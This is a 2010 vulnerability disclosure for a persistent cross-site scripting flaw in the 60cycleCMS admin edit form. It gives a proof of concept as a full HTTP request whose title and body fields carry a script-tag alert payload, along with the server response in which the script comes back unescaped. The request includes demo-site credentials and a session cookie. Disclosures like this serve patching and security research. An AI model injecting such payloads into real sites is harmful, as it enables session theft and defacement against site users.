=======================================================================
   
                                         60cycleCMS Persistent XSS Vulnerability
 
                     =======================================================================
   
                                                     by
   
                                                Pratul Agrawal
 
   
   
  # Vulnerability found in- Admin module
   
  # email         Pratulag@yahoo.com
   
  # company       aksitservices
   
  # Credit by     Pratul Agrawal
 
  # Software      60cycleCMS

  # Category  	  CMS / Portals
  
  # Site p4ge     http://www.opensourcecms.com/demo/2/277/60cycleCMS
  
  # Plateform     php
  
   
   
  #  Proof of concept   #
 
  Targeted URL:  http://www.opensourcecms.com/demo/2/277/60cycleCMS/private/select.php?act=edit
  
 
  In Edit Field provide the malicious script to store in the Database..
=======================================================================
  Request -
=======================================================================
  POST /60cyclecms/private/preview.php HTTP/1.1
  Host: demo.opensourcecms.com
  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-us,en;q=0.5
  Accept-Encoding: gzip,deflate
  Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
  Keep-Alive: 300
  Proxy-Connection: keep-alive
  Referer: http://demo.opensourcecms.com/60cyclecms/private/edit.php
  Cookie: __utma=87180614.1562082400.1268211497.1268211497.1268211497.1; __utmb=87180614.6.10.1268211497; __utmc=87180614; __utmz=87180614.1268211497.1.1.utmcsr=php.opensourcecms.com|utmccn=(referral)|utmcmd=referral|utmcct=/scripts/details.php; PHPSESSID=f6e21193e32af41e62a0c82a839d3a1e
  Authorization: Basic YWRtaW46ZGVtbzEyMw==
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 122

  title="><script>alert("XSS")</script>&body="><script>alert("XSS")</script>&time=&timezone=

=======================================================================  
=======================================================================
  Response-
=======================================================================
  HTTP/1.1 200 OK
  Date: Wed, 10 Mar 2010 09:32:14 GMT
  Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7a mod_bwlimited/1.4 PHP/5.2.12
  X-Powered-By: PHP/5.2.12
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Pragma: no-cache
  Content-Length: 621
  Content-Type: text/html

 <html>
   <body>

   <h2>Post Preview:</h2>
   <form action="" method="post">
   <input type="button" value="Edit Post" onclick="submitForm(this)">
   <input type="button" value="Submit Post" onclick="submitForm(this)">
   </form>

   <script type="text/javascript">
     function submitForm(button)
   {
	if (button.value == "Edit Post")
		button.form.action = "edit.php";
	else
		button.form.action = "submit.php";
		
	button.form.submit();
   }

 </script>
	
  <h2 class="lonelyPost"><a class="titleLink" href="#">"><script>alert("XSS")</script></a></h2><h4>Thursday, January 1, 1970 - 12:00 am</h4><p>"><script>alert("XSS")</script></p></body>
 </html>

=======================================================================


   After execution Just click on the Edit button and the script get executed again and again.
 
 
   #If you have any questions, comments, or concerns, feel free to contact me.